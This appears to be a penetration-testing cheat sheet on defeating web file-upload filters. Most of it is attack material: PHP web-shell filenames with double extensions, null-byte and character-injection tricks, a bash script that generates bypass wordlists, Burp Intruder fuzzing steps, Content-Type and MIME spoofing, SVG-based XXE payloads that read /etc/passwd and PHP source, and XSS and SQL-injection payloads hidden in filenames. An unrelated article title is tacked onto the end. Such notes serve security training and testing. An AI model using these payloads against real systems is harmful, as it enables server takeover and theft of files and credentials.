Tip: You may also do the same to remove accept=".jpg,.jpeg,.png", which should make selecting the PHP shell easier in the file selection dialog, though this is not mandatory, as mentioned earlier.
Blacklist Filters
Blacklisting Extensions
$fileName =basename($_FILES["uploadFile"]["name"]);$extension =pathinfo($fileName,PATHINFO_EXTENSION);$blacklist =array('php','php7','phps');if (in_array($extension, $blacklist)) {echo"File type not allowed";die();}
Tip: The comparison above is also case-sensitive, and is only considering lowercase extensions. In Windows Servers, file names are case insensitive, so we may try uploading a php with a mixed-case (e.g. pHp), which may bypass the blacklist as well, and should still execute as a PHP script.
Fuzzing Extensions
PHP List
ASP extensions
Web extensions
More extensions
What extension is allowed ?
Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.
Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so:
Use /usr/share/wordlists/dirb/extensions_common.txt
Uncheck url-encoding
Run the attack
Search for Non-Blacklisted Extensions - Look Content Length
Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.
Other files that should be restricted for most applications:
.bat
.cgi .exe
.htm -> potential XSS
.html -> potential XSS
.jar
.rar
.shtml
.svg -> potential XSS
.swf -> potential XSS
.tar
.zip
.cer -> potential XSS
.hxt -> potential XSS
.stm -> potential XSS
Whitelist Filters
$fileName =basename($_FILES["uploadFile"]["name"]);if (!preg_match('^.*\.(jpg|jpeg|png|gif)', $fileName)) {echo"Only images are allowed";die();}
Double Extensions
Rename it
shell.php.jpg
shell.png.php
shell.jpeg.php5
shell.jpg.php
shell.phar.jpeg
Fuzz the upload form with This Wordlist to find what extensions are whitelisted by the upload form
if (!preg_match('/^.*\.(jpg|jpeg|png|gif)$/', $fileName)) { ...SNIP... }
Only consider the final file extension, as it uses (^.*\.) to match everything up to the last (.), and then uses ($) at the end to only match extensions that end the file name
shell.php.jpg should pass the earlier whitelist test as it ends with (.jpg), and it would be able to execute PHP code due to the above misconfiguration, as it contains (.php) in its name.
The web application may still utilize a blacklist to deny requests containing PHP extensions. Try to fuzz the upload form with the PHP Wordlist to find what extensions are blacklisted by the upload form.
Character Injection
We can inject several characters before or after the final extension to cause the web application to misinterpret the filename and execute the uploaded file as a PHP script.
The following are some of the characters we may try injecting:
%20
%0a
%00
%0d0a
/
.\
.
…
:
Null Byte
shell.php%00.jpg works with PHP servers with version 5.X or earlier
blank.php%00.png
blank.php%2500.png
Windows server: injecting a colon (:) before the allowed file extension (e.g. shell.aspx:.jpg), which should also write the file as (shell.aspx)
for char in'%20''%0a''%00''%0d0a''/''.\\''.''…'':'; dofor ext in'.php''.phps'; doecho"shell$char$ext.jpg">>wordlist.txtecho"shell$ext$char.jpg">>wordlist.txtecho"shell.jpg$char$ext">>wordlist.txtecho"shell.jpg$ext$char">>wordlist.txtdonedone
Then, fuzz extensions
# vim char_injection.sh
# chmod +x char_injection.sh
# ./char_injection.sh
#!/bin/bash# List of characterschars=('%20''%0a''%00''%0d0a''/''.\\''.''…'':')# List of extensionsextensions=('.php''.phps''.phar''.php8')# Create or clear the wordlist file> wordlist.txt# Loop through each characterfor char in"${chars[@]}"; do# Loop through each extensionfor ext in"${extensions[@]}"; doecho"shell$char$ext.jpg">>wordlist.txtecho"shell$ext$char.jpg">>wordlist.txtecho"shell.jpg$char$ext">>wordlist.txtecho"shell.jpg$ext$char">>wordlist.txtdonedone
Intercept our upload request and change the Content-Type header to it:
Content-Type: image/jpg
Also try with:
Content-Type: image/png
Note: A file upload HTTP request has two Content-Type headers, one for the attached file (at the bottom), and one for the full request (at the top). We usually need to modify the file's Content-Type header, but in some cases the request will only contain the main Content-Type header (e.g. if the uploaded content was sent as POST data), in which case we will need to modify the main Content-Type header.
MIME-Type
Start with GIF
$ echo "this is a text file" > text.jpg
$ file text.jpg
text.jpg: ASCII text
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300">
<circle cx="150" cy="147.5" r="50" fill="#DA3A00" />
<script>console.log("@chux13786509 on X for more content!")</script>
</svg>
XXE - SVG - X-Requested-With: XMLHttpRequest
X-Requested-With: XMLHttpRequest
poc.svg
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><svg>&xxe;</svg>
Read source code in PHP web applications
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]><svg>&xxe;</svg>
XML data is not unique to SVG images, as it is also utilized by many types of documents, like PDF, Word Documents, PowerPoint Documents, among many others.
XXE vulnerability to enumerate the internally available services or even call private APIs to perform private actions
XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is displayed to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.
Malicious PDF File Used As Delivery Mechanism - SANS Internet Storm CenterSANS Internet Storm Center
